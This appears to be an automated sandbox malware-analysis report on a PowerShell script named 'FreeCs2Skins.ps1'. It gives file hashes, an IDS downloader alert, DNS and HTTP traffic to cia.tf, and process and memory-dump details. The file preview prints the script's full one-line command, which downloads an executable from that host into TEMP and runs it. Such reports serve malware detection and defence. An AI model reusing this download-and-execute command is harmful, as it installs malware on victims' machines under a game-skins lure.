                              Preview:...................................FL..................F.".. ...J.S....7..B?..z.:{.............................:..DG..Yr?.D..U..k0.&...&.......$..S....nb*B?..2../B?......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2yY`o...........................^.A.p.p.D.a.t.a...B.V.1.....yY\o..Roaming.@......EW<2yY\o..../.....................U...R.o.a.m.i.n.g.....\.1.....EW.3..MICROS~1..D......EW<2yYYo....0.....................Q%0.M.i.c.r.o.s.o.f.t.....V.1.....EW.5..Windows.@......EW<2yYYo....2......................7..W.i.n.d.o.w.s.......1.....EW@2..STARTM~1..n......EW<2yYYo....5...............D.......Y.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWz5..Programs..j......EW<2yYYo....6...............@.....M.n.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW<2EW<2....7.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW<2yYbo....u...........
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):6224
                              Entropy (8bit):3.7074480723483307
                              Encrypted:false
                              SSDEEP:48:+kD9jlWotuaCQYa3CyMFU2U7Y6ukvhkvklCywbfCL/dlHJ2SogZoX/CL/dlw2SoR:Vbt33CqT2kvhkvCCtzCL/dbHYCL/dYHU
                              MD5:9380634DDEF09DC29164BBD7BD8B9902
                              SHA1:C00F7F0F4515F111A7094A1FF4EA275EDE6F4521
                              SHA-256:6CDEC3A6ADDD3FA794A3AEEED45EC53A12DD9A7C8165952DCF16E581CCA2249A
                              SHA-512:6CFF9FBCD662EE99F80C4C600A443C3ABA7BC971DBDF48A748C6A7238CB0671993356180F3942223CCFA04F2F5C354D7D38C5441629D37A2B7442A6D0DB300C9
                              Malicious:false
                              Preview:...................................FL..................F.".. ...J.S....7..B?..z.:{.............................:..DG..Yr?.D..U..k0.&...&.......$..S....nb*B?..2../B?......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2yY`o...........................^.A.p.p.D.a.t.a...B.V.1.....yY\o..Roaming.@......EW<2yY\o..../.....................U...R.o.a.m.i.n.g.....\.1.....EW.3..MICROS~1..D......EW<2yYYo....0.....................Q%0.M.i.c.r.o.s.o.f.t.....V.1.....EW.5..Windows.@......EW<2yYYo....2......................7..W.i.n.d.o.w.s.......1.....EW@2..STARTM~1..n......EW<2yYYo....5...............D.......Y.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWz5..Programs..j......EW<2yYYo....6...............@.....M.n.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW<2EW<2....7.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW<2yYbo....u...........
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:MS Windows registry file, NT/2000 or above
                              Category:dropped
                              Size (bytes):1835008
                              Entropy (8bit):4.4659182473862735
                              Encrypted:false
                              SSDEEP:6144:DzZfpi6ceLPx9skLmb0fBZWSP3aJG8nAgeiJRMMhA2zX4WABluuNLjDH5S:/ZHtBZWOKnMM6bFpZj4
                              MD5:D6FA2EECABB035B295AC42C2FD631AD4
                              SHA1:B4B26C52D31C9E079744DEED04B80835B5932B03
                              SHA-256:618154A9158FA552B24524B103DFE63F6CE240B5B0F7563B70C0DF82444DC2FE
                              SHA-512:72F66C31C79D50B460408C424A8098B167C58349AF4937EF1B550E284E867C4221AB2BB1C8D576074A0311A335D31D6F69F36A3266C29DD004F9C2B92B761AC7
                              Malicious:false
                              Preview:regfH...H....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..13B?..............................................................................................................................................................................................................................................................................................................................................>{&.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                              File type:ASCII text, with CRLF line terminators
                              Entropy (8bit):5.156553490338682
                              TrID:
                                File name:FreeCs2Skins.ps1
                                File size:130 bytes
                                MD5:192bc64d6047bbc1b994c00b652ef3b5
                                SHA1:349886ab9c80a78f584e2140e4e3bd85f2e717c6
                                SHA256:b67ec07f0a31fc36bd7f8ddea36f21fdf53ec44d87b8eae0b42588b1fc963eff
                                SHA512:3938e5e665bb6fb368ccf8675c2bb03b5b072657d3e9637e7413cb1abd43bbd4414f65721705e24c938c8469eb3f30896a02cba5c2dd8035f88ffa4344ec1f51
                                SSDEEP:3:TTcJRVOELRDPtcGKDlQRj2djTSQqXJAFHBuxH70QEXu1MFH2fxH7Cvn:vShLBuGyQI9dyldgQEXu1MFsdWvn
                                TLSH:38C09B31D1280324C91504D574485537F5C7D10DD1553D59C0277D455514D7D0BD6002
                                File Content Preview:iwr -Uri "https://cia.tf/1d5ad9c8d3fee874d0feb8bfac220a11.exe" -OutFile "$env:TEMP\file.exe"; Start-Process "$env:TEMP\file.exe"..
                                Icon Hash:3270d6baae77db44
                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                2024-11-25T14:59:09.926351+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.649700172.67.129.178443TCP
                                TimestampSource PortDest PortSource IPDest IP
                                Nov 25, 2024 14:59:05.794018030 CET49699443192.168.2.6172.67.129.178
                                Nov 25, 2024 14:59:05.794038057 CET44349699172.67.129.178192.168.2.6
                                Nov 25, 2024 14:59:05.794121981 CET49699443192.168.2.6172.67.129.178
                                Nov 25, 2024 14:59:05.806104898 CET49699443192.168.2.6172.67.129.178
                                Nov 25, 2024 14:59:05.806122065 CET44349699172.67.129.178192.168.2.6
                                Nov 25, 2024 14:59:07.072120905 CET44349699172.67.129.178192.168.2.6
                                Nov 25, 2024 14:59:07.072186947 CET49699443192.168.2.6172.67.129.178
                                Nov 25, 2024 14:59:07.097027063 CET49699443192.168.2.6172.67.129.178
                                Nov 25, 2024 14:59:07.097043037 CET44349699172.67.129.178192.168.2.6
                                Nov 25, 2024 14:59:07.097304106 CET44349699172.67.129.178192.168.2.6
                                Nov 25, 2024 14:59:07.109611034 CET49699443192.168.2.6172.67.129.178
                                Nov 25, 2024 14:59:07.151360989 CET44349699172.67.129.178192.168.2.6
                                Nov 25, 2024 14:59:07.860986948 CET44349699172.67.129.178192.168.2.6
                                Nov 25, 2024 14:59:07.861053944 CET44349699172.67.129.178192.168.2.6
                                Nov 25, 2024 14:59:07.861112118 CET49699443192.168.2.6172.67.129.178
                                Nov 25, 2024 14:59:07.866344929 CET49699443192.168.2.6172.67.129.178
                                Nov 25, 2024 14:59:07.869785070 CET49700443192.168.2.6172.67.129.178
                                Nov 25, 2024 14:59:07.869833946 CET44349700172.67.129.178192.168.2.6
                                Nov 25, 2024 14:59:07.869915962 CET49700443192.168.2.6172.67.129.178
                                Nov 25, 2024 14:59:07.870322943 CET49700443192.168.2.6172.67.129.178
                                Nov 25, 2024 14:59:07.870337963 CET44349700172.67.129.178192.168.2.6
                                Nov 25, 2024 14:59:09.129982948 CET44349700172.67.129.178192.168.2.6
                                Nov 25, 2024 14:59:09.131747961 CET49700443192.168.2.6172.67.129.178
                                Nov 25, 2024 14:59:09.131762981 CET44349700172.67.129.178192.168.2.6
                                Nov 25, 2024 14:59:09.926419973 CET44349700172.67.129.178192.168.2.6
                                Nov 25, 2024 14:59:09.926549911 CET44349700172.67.129.178192.168.2.6
                                Nov 25, 2024 14:59:09.926609039 CET49700443192.168.2.6172.67.129.178
                                Nov 25, 2024 14:59:09.926629066 CET44349700172.67.129.178192.168.2.6
                                Nov 25, 2024 14:59:09.926851034 CET44349700172.67.129.178192.168.2.6
                                Nov 25, 2024 14:59:09.926901102 CET49700443192.168.2.6172.67.129.178
                                Nov 25, 2024 14:59:09.951714993 CET49700443192.168.2.6172.67.129.178
                                TimestampSource PortDest PortSource IPDest IP
                                Nov 25, 2024 14:59:05.643160105 CET6089353192.168.2.61.1.1.1
                                Nov 25, 2024 14:59:05.781275034 CET53608931.1.1.1192.168.2.6
                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                Nov 25, 2024 14:59:05.643160105 CET192.168.2.61.1.1.10x1170Standard query (0)cia.tfA (IP address)IN (0x0001)false
                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                Nov 25, 2024 14:59:05.781275034 CET1.1.1.1192.168.2.60x1170No error (0)cia.tf172.67.129.178A (IP address)IN (0x0001)false
                                Nov 25, 2024 14:59:05.781275034 CET1.1.1.1192.168.2.60x1170No error (0)cia.tf104.21.1.182A (IP address)IN (0x0001)false
                                • cia.tf
                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                0192.168.2.649699172.67.129.1784433300C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                TimestampBytes transferredDirectionData
                                2024-11-25 13:59:07 UTC187OUTGET /1d5ad9c8d3fee874d0feb8bfac220a11.exe HTTP/1.1
                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                Host: cia.tf
                                Connection: Keep-Alive
                                2024-11-25 13:59:07 UTC797INHTTP/1.1 302 Found
                                Date: Mon, 25 Nov 2024 13:59:07 GMT
                                Content-Type: text/plain; charset=utf-8
                                Content-Length: 23
                                Connection: close
                                location: /
                                vary: Accept
                                x-powered-by: Express
                                CF-Cache-Status: BYPASS
                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SrsoZPIgU28JtOzM9LOwh%2Bbqc%2FGP1qnBa6G%2F244j4YJ1XZxOfjGJilRVIb%2F5AgEzIckYdVfHrsDsZU7T8zroGCeVooZSFQkBvLJH3Eoprhtb2tCJi1GsJqk%3D"}],"group":"cf-nel","max_age":604800}
                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                Server: cloudflare
                                CF-RAY: 8e82284efc700f39-EWR
                                alt-svc: h3=":443"; ma=86400
                                server-timing: cfL4;desc="?proto=TCP&rtt=1503&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2809&recv_bytes=801&delivery_rate=1938911&cwnd=249&unsent_bytes=0&cid=d6ae614fcc77126b&ts=802&x=0"
                                2024-11-25 13:59:07 UTC23INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 2f
                                Data Ascii: Found. Redirecting to /


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                1192.168.2.649700172.67.129.1784433300C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                TimestampBytes transferredDirectionData
                                2024-11-25 13:59:09 UTC127OUTGET / HTTP/1.1
                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                Host: cia.tf
                                2024-11-25 13:59:09 UTC881INHTTP/1.1 200 OK
                                Date: Mon, 25 Nov 2024 13:59:09 GMT
                                Content-Type: text/html; charset=UTF-8
                                Transfer-Encoding: chunked
                                Connection: close
                                accept-ranges: bytes
                                Cache-Control: public, max-age=0
                                last-modified: Thu, 26 Sep 2024 14:36:03 GMT
                                x-powered-by: Express
                                cf-cache-status: DYNAMIC
                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KIAgl%2BC%2Fp6%2BYd36X49gZZh55g98a5Ap%2BTt9bXZlS1G3LjTwIwFApdftjq9k2SY%2BiFNCUmF7w3nZiyupdG5ftgQrZnqUSHZwguuSLcpIIrvxW4C%2FTP7j4riA%3D"}],"group":"cf-nel","max_age":604800}
                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                Server: cloudflare
                                CF-RAY: 8e82285bccd9c3f5-EWR
                                alt-svc: h3=":443"; ma=86400
                                server-timing: cfL4;desc="?proto=TCP&rtt=1520&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2807&recv_bytes=765&delivery_rate=1859872&cwnd=219&unsent_bytes=0&cid=e01d4ac7d2bb1998&ts=802&x=0"
                                2024-11-25 13:59:09 UTC488INData Raw: 38 30 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 63 69 61 2e 74 66 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 30 30 30 30 30 30 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e
                                Data Ascii: 80e<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>cia.tf</title> <meta name="theme-color" content="#000000" /> <meta name="description" con
                                2024-11-25 13:59:09 UTC1369INData Raw: 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 6a 75 73 74 20 61 20 66 72 65 73 68 20 66 69 6c 65 20 75 70 6c 6f 61 64 65 72 20 62 75 69 6c 74 20 66 6f 72 20 74 68 65 20 6d 6f 64 65 72 6e 20 61 67 65 73 20 f0 9f 92 a3 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 74 77 69 74 74 65 72 3a 64 6f 6d 61 69 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 63 69 61 2e 74 66 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 74 77 69 74 74 65 72 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 63 69 61 2e 74 66 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 63 69 61 2e 74 66 22 3e 0a 20 20 20 20 3c
                                Data Ascii: y="og:description" content="just a fresh file uploader built for the modern ages "> <meta property="twitter:domain" content="cia.tf"> <meta property="twitter:url" content="https://cia.tf"> <meta name="twitter:title" content="cia.tf"> <
                                2024-11-25 13:59:09 UTC212INData Raw: 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 2f 62 61 73 68 22 3e 23 2f 62 69 6e 2f 62 61 73 68 3c 2f 61 3e 20 f0 9f 91 80 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 62 61 64 2e 69 73 2d 68 61 76 69 6e 67 2e 66 75 6e 22 3e 79 65 73 42 61 64 3c 2f 61 3e 20 f0 9f 96 a4 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 71 75 65 74 74 74 65 2e 63 6f 6d 22 3e 44 72 69 66 74 65 72 3c 2f 61 3e 3c 2f 69 3e 0a 20 20 20 20 3c 2f 66 6f 6f 74 65 72 3e 0a 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 73 63 72 69 70 74 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                Data Ascii: <a href="/bash">#/bin/bash</a> <a href="https://bad.is-having.fun">yesBad</a> <a href="https://coquettte.com">Drifter</a></i> </footer> <script src="/script.js"></script></body></html>
                                2024-11-25 13:59:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                Data Ascii: 0


                                Click to jump to process

                                Click to jump to process

                                Click to dive into process behavior distribution

                                Click to jump to process

                                Target ID:0
                                Start time:08:59:02
                                Start date:25/11/2024
                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\FreeCs2Skins.ps1"
                                Imagebase:0x7ff6e3d50000
                                File size:452'608 bytes
                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:1
                                Start time:08:59:02
                                Start date:25/11/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff66e660000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Reset < >
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2256543811.00007FFD34960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34960000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd34960000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6fbb4d797d26fa2df6076b216fdce615bca55f36a8d79c1b3007424994f39c6d
                                  • Instruction ID: 0d24cc17591da69c6be4fc5753f940bd88ce2cb3a8d379696034b5eb8a75f8ca
                                  • Opcode Fuzzy Hash: 6fbb4d797d26fa2df6076b216fdce615bca55f36a8d79c1b3007424994f39c6d
                                  • Instruction Fuzzy Hash: 2041F232B4CA494FEB55EB6894A15B8B7D2EF99220B1840BEC50DCB197CE1DE805C390
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2256543811.00007FFD34960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34960000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd34960000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 75976eef51b183b82637114ebdc20eda26bd31914907dcab12bbd4d0bd2352ff
                                  • Instruction ID: dd31ef66a474461b8d916663897941afc92c32a42257f7144f29bdf837b901dc
                                  • Opcode Fuzzy Hash: 75976eef51b183b82637114ebdc20eda26bd31914907dcab12bbd4d0bd2352ff
                                  • Instruction Fuzzy Hash: 8511E531B4D6854FEB55EB5880A45B877D2EF5A330B5440FEC50DCB097CE2DA845D360
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2256235424.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd34890000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                  • Instruction ID: bf533fd274c58afd781b72c11c81cc6882029034b975418c297449fcca739756
                                  • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                  • Instruction Fuzzy Hash: 5D01677121CB0D4FD744EF4CE451AA6B7E0FB99364F10056DE58AC3651D736E882CB45
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2256235424.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd34890000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: aa6b23b116343dcaf6a0a43f1376fd2e61495e4fee3d87420049573b865347c1
                                  • Instruction ID: af8c4263539a5f3e8d9f53fbc07dba5f92f76245d7f7d3ee68a2eecc94e70835
                                  • Opcode Fuzzy Hash: aa6b23b116343dcaf6a0a43f1376fd2e61495e4fee3d87420049573b865347c1
                                  • Instruction Fuzzy Hash: 7581E913F0D9961FE761A7ACA8B61EA7BE4DF9337570D01B3C5C8CA093ED1868069391
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2256235424.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd34890000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2e1789dff4d0964f725eac272aa13fac0f69b448e92bde7c9bfe7a13668bbfd2
                                  • Instruction ID: 9ae26b27a2ba8843584dc98c191dd7fcefdd57dd452aa37091c866ffafadb029
                                  • Opcode Fuzzy Hash: 2e1789dff4d0964f725eac272aa13fac0f69b448e92bde7c9bfe7a13668bbfd2
                                  • Instruction Fuzzy Hash: 9391E267B0EFC25FF712472C58B61E53FE0EF572A570900B3C695CA093EA1E2C46A661
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2256235424.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd34890000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 38d76c33fc226de1fe333a941bcc28168a7875a0eca0e15bcba973d2e1e44a38
                                  • Instruction ID: c9c0ad3cdfcb913f55688913efa68ebc26dc4a2d59ff4daf6e56922cd7ec289a
                                  • Opcode Fuzzy Hash: 38d76c33fc226de1fe333a941bcc28168a7875a0eca0e15bcba973d2e1e44a38
                                  • Instruction Fuzzy Hash: 04516C97B0DBD24FE6135B7C58B50E67FA0DF5326531900B7C6D4DA0A3D91C281BA3A2
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2256235424.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffd34890000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e6ea33ca97656343da3cf95d12365158de2567d48e92099bc3dbf091c3a9b78c
                                  • Instruction ID: 77053a49742ea8ea3a14e87c62fbf18860bdb2bac3e1bacaf7bb57bb6e1522df
                                  • Opcode Fuzzy Hash: e6ea33ca97656343da3cf95d12365158de2567d48e92099bc3dbf091c3a9b78c
                                  • Instruction Fuzzy Hash: 2D515E57B0DAD25BE7135BBC68B60E63FE4DF4326970911B3C6C4DA0A3ED1C1807A292